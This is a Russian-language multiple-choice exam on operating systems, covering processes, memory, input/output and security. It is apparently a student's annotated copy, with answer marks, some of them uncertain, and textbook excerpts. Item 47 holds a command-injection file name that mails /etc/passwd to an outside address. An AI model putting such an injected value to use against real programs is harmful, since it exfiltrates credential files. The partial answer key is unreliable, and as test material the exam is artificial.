ЗАДАНИЕ N 1 Назначение и функции операционных систем
Для сетевых операционных
систем характерной является функция обеспечения …
|
1)
|
прямого доступа к
оперативной памяти другого компьютера
|
|
2)
|
взаимодействия
связанных между собой компьютеров
|
3)
|
обмена сигналами между
выполняющимися на разных компьютерах программами
|
|
4)
|
программных каналов
между разными компьютерами
|
|
|
ЗАДАНИЕ N 2 Операционная среда
Одна операционная система может поддерживать
несколько …
|
1)
|
микропрограммных сред
|
|
2)
|
операционных систем
|
3)
|
микропрограммных систем
|
|
4)
|
операционных
сред
|
|
Операционная система выполняет функции
управления вычислительными процессами в вычислительной системе,
распределяет ресурсы вычислительной системы между различными
вычислительными процессами и образует программную среду, в которой
выполняются прикладные программы пользователя. Такая среда называется операционной. Параллельное
существование терминов “операционная система” и “операционная среда”
вызвано тем, что операционная система может поддержать несколько
операционных сред.
|
ЗАДАНИЕ N 3 Прерывания
Термин "маскирование" означает
запрет отдельных …
|
1)
|
сигналов
прерывания
|
|
2)
|
команд пользователя
|
3)
|
процессов пользователя
|
|
4)
|
команд процессора
|
|
|
ЗАДАНИЕ N 4 Процессы и потоки
Для реализации синхронизации на уровне языка
программирования используются высокоуровневые примитивы, названные …
|
1)
|
супервизорами
|
|
2)
|
мониторами
|
3)
|
маркерами
|
|
4)
|
семафорами
|
Монитор (по Ч. Хоару) – высокоуровневая
конструкция для синхронизации: многовходовый модуль, содержащий описание
общих данных и операций над ними в виде процедур. Обеспечивается взаимное
исключение исполнения мониторных операций. Монитор может также содержать
условные переменные, для которых определены операции wait и signal для
организации дополнительных очередей процессов. Рассмотрено решение задачи
"обедающие философы" с использованием монитора. Описана
реализация монитора и условных переменных с помощью семафоров.
|
|
ЗАДАНИЕ N 5 Файлы и файловые системы
Относительный путь к файлу состоит из списка
каталогов, которые нужно …
|
1)
|
пройти
от рабочего каталога, чтобы добраться до файла
|
|
2)
|
открыть в корневом
процессе, чтобы добраться до файла
|
3)
|
добавить в переменную
PATH операционной среды
|
|
4)
|
пройти от корневого
каталога, чтобы добраться до файла
|
|
|
ЗАДАНИЕ N 6 Память
Свопингом сегментов называется перемещение …
|
1)
|
блоков файла между
каталогами файловой системы
|
|
2)
|
блоков данных между процессом
и ядром операционной системы
|
3)
|
сегментов данных между
стеком и оперативной памятью
|
|
4)
|
сегментов
между оперативной и внешней памятью
|
|
|
ЗАДАНИЕ N 7 Пользователи
Идентификатор пользователя представляет
собой уникальное _______ значение
|
1)
|
составное
|
|
2)
|
символьное
|
3)
|
вещественное
|
|
4)
|
целое
|
|
|
ЗАДАНИЕ N 8 Режимы работы
Мультитерминальный режим работы предполагает
совмещение …
|
1)
|
привилегированного
режима работы и режима пользователя
|
|
2)
|
многопроцессорного
режима работы и режима ввода-вывода
|
3)
|
диалогового
режима работы и режима мультипрограммирования
|
|
4)
|
аналогового режима
работы и режима микропрограммирования
|
|
|
ЗАДАНИЕ N 9 Концепция процесса
Последовательная трансляция двух исходных
программ является …
|
1)
|
одним последовательным
процессом
|
|
2)
|
двумя одинаковыми
процессами
|
3)
|
двумя
разными процессами
|
|
4)
|
одной последовательной
задачей
|
|
|
ЗАДАНИЕ N 10 Идентификатор, дескриптор и контекст процесса
Идентификатор процесса является частью
_____________ процесса.
|
1)
|
контекста
|
|
2)
|
Типа
|
3)
|
дескриптора !!!
|
|
4)
|
Описателя
|
|
|
ЗАДАНИЕ N 11 Иерархия процессов
В OS UNIX каждый новый
процесс может быть образован (порожден) только …
|
1)
|
двумя из существующих
процессов
|
|
2)
|
несколькими родительскими
процессами
|
3)
|
четным количеством
родительских процессов
|
|
4)
|
одним
из существующих процессов
|
|
|
ЗАДАНИЕ N 12 Диспетчеризация процессов ( - выберите один вариант ответа)
Основное различие между долгосрочным и
краткосрочным планированием (диспетчеризацией) заключается в …
|
1)
|
длительности выполнения
|
|
2)
|
очередности выполнения
|
3)
|
скорости выполнения
|
|
4)
|
частоте
выполнения
|
|
Планирование заданий используется в качестве долгосрочного планирования процессов. Оно отвечает за порождение новых процессов в системе,
определяя ее степень
мультипрограммирования, т. е. количество
процессов, одновременно находящихся в ней. Если степень мультипрограммирования системы поддерживается постоянной, т. е. среднее количество
процессов в компьютере не меняется, то новые процессы могут появляться
только после завершения ранее загруженных. Поэтому долгосрочное планирование осуществляется достаточно редко.
|
ЗАДАНИЕ N 13 Понятия приоритета и очереди процессов
Приоритет, меняющейся во
время исполнения процесса, называется _______ приоритетом.
|
1)
|
фиксированным
|
|
2)
|
Циклическим
|
3)
|
статическим
|
|
4)
|
Динамическим
|
|
|
ЗАДАНИЕ N 14 Синхронизация процессов
При совместном
использовании процессами аппаратных и информационных ресурсов
вычислительной системы возникает потребность в …
|
1)
|
адаптации
|
|
2)
|
Синхронизации
|
3)
|
оптимизации
|
|
4)
|
Буферизации
|
|
|
ЗАДАНИЕ N 15 Средства обработки сигналов
В операционной системе
UNIX сигналы можно рассматривать как простейшую форму взаимодействия между
…
|
1)
|
процессами
|
|
2)
|
процессорами
|
3)
|
сегментами
|
|
4)
|
каналами
|
|
|
ЗАДАНИЕ N 16 Понятие событийного программирования ?????
( - выберите несколько вариантов ответа) Область
эффективного применения событийного программирования начинается там, где
возникают …
|
1)
|
трудности
декомпозиции решаемой задачи, при которой генерация и обработка
рассматриваются как объединенные процессы
|
|
2)
|
возможности
декомпозиции решаемой задачи, при которой генерация и обработка
рассматриваются как объединенные процессы
|
3)
|
необходимость
использования графа перехода между состояниями
|
|
4)
|
неудобство
использования графа переходов между состояниями
|
|
|
ЗАДАНИЕ N 17 Средства коммуникации процессов
Два параллельных процесса могут быть …
|
1)
|
Взаимоисключающими
|
|
2)
|
независимыми
|
3)
|
Критическими
|
|
4)
|
коммутационными
|
|
|
ЗАДАНИЕ N 18 Способы реализации мультипрограммирования
Главной целью мультипрограммирования в
системах пакетной обработки является …
|
1)
|
обеспечение удобства
работы пользователей
|
|
2)
|
минимизация
простоев всех устройств компьютера
|
3)
|
минимизация времени
выполнения одной задачи
|
|
4)
|
обеспечение
реактивности системы
|
|
|
ЗАДАНИЕ N 19 Организация памяти. Адресное пространство
Учет участков свободной памяти с помощью
связного списка свободных/занятых блоков позволяет …
|
1)
|
находить в памяти
наиболее долго занятые участки
|
|
2)
|
выделять
участки памяти произвольных размеров
|
3)
|
освобождать память,
занятую неактивными процессами
|
|
4)
|
перемещать процессы в
памяти
|
|
|
ЗАДАНИЕ N 20 Методы управления памятью
Использование виртуальной
памяти в однопрограммном режиме приводит к … процесса, если размер
программы существенно больше объема доступной оперативной памяти
|
1)
|
аварийному завершению
|
|
2)
|
Ускорению
|
3)
|
замедлению
выполнения
|
|
4)
|
перезапуску
|
|
|
ЗАДАНИЕ N 21 Принципы организации виртуальной памяти
Виртуальная память позволяет …
|
1)
|
отказаться от
предоставления прикладным процессам оперативной памяти
|
|
2)
|
загружать
множество небольших программ, суммарный объем которых больше объема
физической памяти
|
3)
|
загружать
программы, размер которых превышает объем доступной физической памяти
|
|
4)
|
загружать программы,
скомпилированные для другого процессора
|
|
|
ЗАДАНИЕ N 22 Сегментная организация памяти
Сегментная организация памяти … отдельно
скомпилированных процедур.
|
1)
|
состоит из
|
|
2)
|
упрощает
компоновку
|
3)
|
невозможна без
|
|
4)
|
усложняет компоновку
|
|
Помимо простоты управления увеличивающимися или сокращающимися
структурами данных, сегментированная память обладает и другими
преимуществами.
К ним относятся: простота компоновки отдельно скомпилированных
процедур (обращение к начальной точке процедуры осуществляется адресом вида
(n,0), где n – номер сегмента);
|
ЗАДАНИЕ N 23 Страничная организация памяти
При страничной организации памяти таблица
страниц может размещаться в …
|
1)
|
только в оперативной
памяти
|
|
2)
|
в оперативной памяти и
на диске
|
3)
|
только в процессоре
|
|
4)
|
В
специальной быстрой памяти процессора и в оперативной памяти
|
|
|
ЗАДАНИЕ N 24 Ускорение работы страничной памяти
Страничная организация предназначена для …
|
1)
|
облегчения совместного
использования процедур, библиотек и массивов данных
|
|
2)
|
повышения уровня защиты
программ и данных
|
3)
|
получения
большого адресного пространства без приобретения дополнительной
физической памяти
|
|
4)
|
логического разделения
программ и данных
|
|
|
ЗАДАНИЕ N 25 Принципы замещения страниц При
страничном сбое и отсутствии свободных блоков физической памяти
операционная система должна …
|
1)
|
выбрать
страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на
диске
|
|
2)
|
выбрать
страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на
диске, если она претерпела изменения
|
3)
|
выбрать страницу,
которая не изменялась, и сохранить удаляемую страницу на диске
|
|
4)
|
выбрать
страницу-кандидат на удаление из памяти и сохранить копию удаляемой
страницы в таблице страниц
|
|
|
ЗАДАНИЕ N 26 Алгоритмы замещения страниц
Полная реализация
алгоритма LRU (Least Recently Used) …
|
1)
|
теоретически невозможна
|
|
2)
|
возможна при
использовании стековой организации таблицы страниц
|
3)
|
возможна при условии
построения таблицы страниц в виде бинарных деревьев
|
|
4)
|
практически
невозможна
|
|
LRU - хороший, но труднореализуемый алгоритм. Необходимо иметь
связанный список всех страниц в памяти, в начале которого будут хранится
недавно использованные страницы. Причем этот список должен обновляться при
каждом обращении к памяти. Много времени нужно и на поиск страниц в таком
списке.
|
ЗАДАНИЕ N 27 Прерывания от внешних устройств
Запросы на ввод-вывод от супервизора задач
или от программных модулей самой операционной системы получает
_____________ ввода-вывода.
|
1)
|
контроллер
|
|
2)
|
диспетчер
|
3)
|
супервизор
|
|
4)
|
процессор
|
|
супервизор ввода-вывода получает запросы на ввод-вывод от
супервизора задач или от программных модулей самой операционной системы
|
ЗАДАНИЕ N 28 Классификация устройств ввода-вывода
Мыши (в качестве устройства-указателя)
относятся к _____________ устройствам ввода-вывода.
|
1)
|
позиционируемым
|
|
2)
|
символьным
|
3)
|
адресуемым
|
|
4)
|
Блочным
|
|
Другой тип устройств ввода-вывода — символьные устройства. Они
выдают или воспринимают поток символов, не относящийся ни к какой блочной
структуре. Они не являются адресуемыми и не имеют никакой операции
позиционирования. В качестве символьных устройств могут рассматриваться
принтеры, сетевые интерфейсы, мыши (в качестве устройства-указателя)
|
ЗАДАНИЕ N 29 Основные принципы организации ввода-вывода
Любые операции по управлению вводом-выводом
объявляются …
|
1)
|
привилегированными
|
|
2)
|
Универсальными
|
3)
|
приоритетными
|
|
4)
|
Уникальными
|
|
|
ЗАДАНИЕ N 30 Функции супервизора ввода-вывода
Супервизор ввода-вывода инициирует операции
ввода-вывода и в случае управления вводом-выводом с использованием
прерываний предоставляет процессор …
|
1)
|
супервизору прерываний
|
|
2)
|
диспетчеру
задач
|
3)
|
задаче пользователя
|
|
4)
|
супервизору программ
|
|
|
ЗАДАНИЕ N 31 Режимы управления вводом-выводом
В режиме обмена с опросом готовности
устройства ввода-вывода используется _____________ центрального процессора.
|
1)
|
рационально время
|
|
2)
|
нерационально память
|
3)
|
нерационально
время
|
|
4)
|
рационально память
|
|
|
ЗАДАНИЕ N 32 Закрепление устройств, общие устройства
ввода-вывода
Понятия «виртуального устройства» по
отношению к понятию «спулинга» …
|
1)
|
соотносится как
часть и целое???
|
|
2)
|
является более
широким!!
|
3)
|
является более узким
|
|
4)
|
Тождественно
|
|
|
ЗАДАНИЕ N 33 Основные системные таблицы ввода-вывода
Каждый элемент таблицы оборудования условно
называется …
|
1)
|
UCB!!!
|
|
2)
|
USB
|
3)
|
DCB
|
|
4)
|
DRT
|
|
Каждая ОС имеет свои таблицы ввода/вывода, их состав
(количество и назначение каждой таблицы) может сильно отличаться. Первая
таблица содержит информацию обо всех устройствах ввода/вывода,
подключенных к вычислительной системе,- таблица оборудования (equipment
table), а каждый элемент этой таблицы называется UCB (unit control block,
блок управления устройством ввода/вывода). Вторая таблица предназначена для
реализации принципа виртуализации устройств ввода/вывода – независимости
от устройства. Действительное устройство, которое сопоставляется
виртуальному (логическому), выбирается супервизором с помощью таблицы
описания виртуальных логических устройств (DRT, device reference table).
Назначение этой второй таблицы – установление связи между виртуальными
(логическими) устройствами и реальными устройствами, описанными
посредством первой таблицы оборудования.
|
ЗАДАНИЕ N 34 Синхронный и асинхронный ввод-вывод
Для увеличения скорости выполнения
приложений при необходимости предлагается использовать _____________
ввод-вывод.
|
1)
|
асинхронный
|
|
2)
|
приоритетный
|
3)
|
автоматический
|
|
4)
|
синхронный
|
|
|
ЗАДАНИЕ N 35 Организация внешней памяти на магнитных дисках
Программа, расположенная в главной
загрузочной записи, называется _____________ загрузчиком.
|
1)
|
системным
|
|
2)
|
Внесистемным
|
3)
|
начальным
|
|
4)
|
Локальным
|
|
На жестком диске по физическому адресу 0-0-1 располагается
главная загрузочная
запись
(master boot record, MBR). В состав MBR входят:
- внесистемный загрузчик (non-system bootstrap - NSB);
- таблица описания разделов
диска (таблица разделов, partition table, PT).
|
ЗАДАНИЕ N 36 Кэширование операций ввода-вывода при работе с
накопителями на магнитных дисках
Простейшим вариантом ускорения дисковых
операций чтения данных можно считать использование двойной …
|
1)
|
Кластеризации
|
|
2)
|
буферизации
|
3)
|
Диспетчеризации
|
|
4)
|
приоритезации
|
|
|
ЗАДАНИЕ N 37 Принципы построенияОС
Операционная система
реального времени должна обеспечивать …
|
1)
|
делегирование
полномочий
|
|
2)
|
наследование
приоритетов
|
3)
|
пакетную обработку
|
|
4)
|
клонирование
пользователей
|
|
Требования, предъявляемые к среде исполнения систем реального
времени, следующие:
- ядро с приоритетом на обслуживание прерывания. Приоритет на
прерывание означает, что готовый к запуску процесс, обладающий некоторым
приоритетом, обязательно имеет преимущество в очереди по отношению к
процессу с более низким приоритетом, быстро заменяет последний и поступает
на выполнение. Ядро заканчивает любую сервисную работу, как только
поступает задача с высшим приоритетом.
- диспетчер с приоритетом - дает возможность разработчику прикладной
программы присвоить каждому загрузочному модулю приоритет, неподвластный
системе. Присвоение приоритетов используется для определения очередности
запуска программ, готовых к исполнению. Диспетчеризация, в основу которой
положен принцип присвоения приоритета, и наличие ядра с приоритетом на
прерывание позволяют . Если наступает событие с высшим приоритетом, система
прекращает обработку задачи с низшим приоритетом и отвечает на вновь
поступивший запрос. Мартин Тиммерман сформулировал следующие необходимые
требования для ОСРВ
- ОС должна быть
многозадачной и допускающей вытеснение (preemptable),
- ОС должна обладать
понятием приоритета для потоков,
- ОС должна
поддерживать предсказуемые механизмы синхронизации,
- ОС должна
обеспечивать механизм наследования приоритетов,
|
ЗАДАНИЕ N 38 Ядро и ресурсы
К невыгружаемым относятся такие ресурсы,
которые не могут быть …
|
1)
|
загружены в память
|
|
2)
|
выгружены из памяти
|
3)
|
отобраны
у процесса
|
|
4)
|
отобраны у процессора
|
|
Выгружаемый
ресурс -
этот ресурс безболезненно можно забрать у процесса (например: память).
Невыгружаемый
ресурс - этот
ресурс нельзя забрать у процесса без потери данных (например: принтер).
|
ЗАДАНИЕ N 39 Интерфейсы операционных систем
Интерфейс прикладного программирования
предназначен для использования прикладными программами …
|
1)
|
системных
ресурсов компьютера
|
|
2)
|
регистров общего
назначения процессора
|
3)
|
интерпретатора команд
пользователя
|
|
4)
|
адресного пространства
процесса
|
|
Практически все операционные системы
имеют API, с помощью которого программисты могут создавать приложения для
этой операционной системы. Главный API операционных систем — это
множество системных вызовов.
|
ЗАДАНИЕ N 40 Классификация операционных систем
По режиму обработки задач различают
операционные системы, обеспечивающие _________ режим
|
1)
|
мультипрограммный
|
|
2)
|
виртуальный
|
3)
|
однопрограммный
|
|
4)
|
многопользовательский???
|
|
|
ЗАДАНИЕ N 41 Анализ угроз и уязвимостей в операционных системах
Угроза зомби реализуется с помощью … и
заставляет компьютер выполнять приказания других лиц.
|
1)
|
вызова утилит
операционной системы
|
|
2)
|
диспетчера приложений
|
3)
|
вредоносных
программ
|
|
4)
|
подбора пароля
|
|
ботнет
или зомби-сеть – это
сеть компьютеров, зараженных вредоносной программой поведения Backdoor.
Backdoor’ы позволяют киберпреступникам удаленно управлять зараженными
машинами (каждой в отдельности, частью компьютеров, входящих в сеть, или
всей сетью целиком) без ведома пользователя.
|
ЗАДАНИЕ N 42 Основы криптографии
Недостаток систем шифрования с секретным
ключом состоит в том, что …
|
1)
|
отправитель сообщения
не может его расшифровать
|
|
2)
|
отправитель
и получатель должны иметь общий секретный ключ
|
3)
|
объем вычислений при
дешифровании намного больше, чем при шифровании
|
|
4)
|
объем вычислений при
шифровании намного больше, чем при дешифровании
|
|
Эффективность систем с секретным ключом обусловлена вполне
приемлемым объемом вычислений, необходимых для шифрования или дешифрования
сообщения, но у них имеется серьезный недостаток: и отправитель, и
получатель должны владеть общим секретным ключом
|
ЗАДАНИЕ N 43 Механизмы защиты
Объектами защиты в компьютерных системах
могут быть …
|
ВАРИАНТЫ ОТВЕТОВ:
1)
|
устройства отображения
информации
|
|
2)
|
помещения
|
3)
|
сотрудники
|
|
4)
|
программы
|
|
Объект защиты — информация, носитель информации или
информационный процесс, в отношении которых необходимо обеспечивать защиту
в соответствии с поставленной целью защиты информации.
|
ЗАДАНИЕ N 44 Надежные вычислительные системы
Политика принудительного управления доступом
(mandatory access control) возлагает полномочия по назначению прав доступа
к файлам и другим объектам на ...
|
ВАРИАНТЫ ОТВЕТОВ:
1)
|
пользователей
|
|
2)
|
прикладную программу
|
3)
|
операционную систему
|
|
4)
|
руководителей
подразделений
|
|
|
ЗАДАНИЕ N 45 Методы аутентификации
Защита зашифрованных
паролей в UNIX взламывается путем …
|
1)
|
шифрования
множества потенциальных паролей открытым алгоритмом шифрования и поиска
совпадений в файле паролей
|
|
2)
|
привлечения инсайдеров
в качестве сообщников
|
3)
|
расшифровки всех
паролей после копирования файла паролей
|
|
4)
|
вычисления пароля путем
свертки идентификатора пользователя
|
|
|
ЗАДАНИЕ N 46 Инсайдерские атаки
Лазейки в программах
создаются …
|
1)
|
для
облегчения отладки программ или в противоправных целях
|
|
2)
|
только для
противоправных целей
|
3)
|
для внедрения в
программу постороннего кода
|
|
4)
|
только для облегчения
отладки программ
|
|
Лазейки (trapdoors). Лазейка представляет собой точку входа в
программу, благодаря чему открывается непосредственный доступ к некоторым
системным функциям. Лазейки обычно вставляют во время проектирования
системы. Системные программисты организуют их при отладке программы, но по
завершении ее разработки их надо устранить.
|
ЗАДАНИЕ N 47 Внешние атаки
Программа, выполняющая
копирование файла путем системного вызова, запрашивает у пользователя имена
файла-источника и файла-приемника. Злоумышленник ввел в качестве имен
файлов следующие значения: “aaa” и “bbb; mail goofinator@mail.ru
</etc/passwd”. Какие действия выполнит система?
|
1)
|
Скопирует файл aaa в
bbb отправит файл bbb адресату goofinator@mail.ru.
|
|
2)
|
Отправит файл aaa
адресату goofinator@mail.ru.
|
3)
|
Скопирует текст aaa в
файл паролей, относящийся к пользователю с идентификатором
goofinator@mail.ru.
|
|
4)
|
Скопирует
файл aaa в bbb и отправит по электронной почте файл паролей адресату
goofinator@mail.ru.
|
|
|
ЗАДАНИЕ N 48 Вредоносные программы
Наиболее популярное
применение ботнетов (сети зараженных компьютеров) - это …
|
1)
|
организация сетевых
азартных игр
|
|
2)
|
распространение
пиратского контента
|
3)
|
рассылка
коммерческого спама
|
|
4)
|
хищение денег с
кредитных карт
|
|
|
ЗАДАНИЕ N 49 Троянские кони и вирусы
Перезаписывающий вирус
заражает исполняемую программу путем …
|
1)
|
записи кода вируса в
тело зараженной программы после каждого ее вызова
|
|
2)
|
перезаписи содержимого
стека программы кодом вируса
|
3)
|
перезаписи служебных
секторов дисков
|
|
4)
|
записи вируса на
место кода программы!!!
|
|
|
ЗАДАНИЕ N 50 Средства защиты от вредоносных программ
Обнаружить зашифрованный вирус можно
...
|
1)
|
с помощью
универсальной программы дешифрования
|
|
2)
|
по характерному
поведению зараженной программы при запуске
|
3)
|
по сигнатурам
кода процедур расшифровки вируса!!!
|
|
4)
|
по изменению размера
программы
|
|
Это вирусы-партизаны, которые попав в систему, сразу не дают
себя обнаружить и не вступают в активную фазу. Они выжидают нужное им
время, находясь в закодированном и безвредном состоянии, при этом зачастую
они остаются незамеченными сканерами антивирусов. Как только наступает
благоприятное для заражения файлов время, вирусы дешифруются, выполняют
свою «грязную работу» и снова кодируются. Различные методы шифрования и
упаковки вредоносных программ делают даже известные вирусы не
обнаруживаемыми антивирусным программным обеспечением. Для обнаружения этих
«замаскированных» вирусов требуется мощный механизм распаковки, который
может дешифровать файлы перед их проверкой
|
|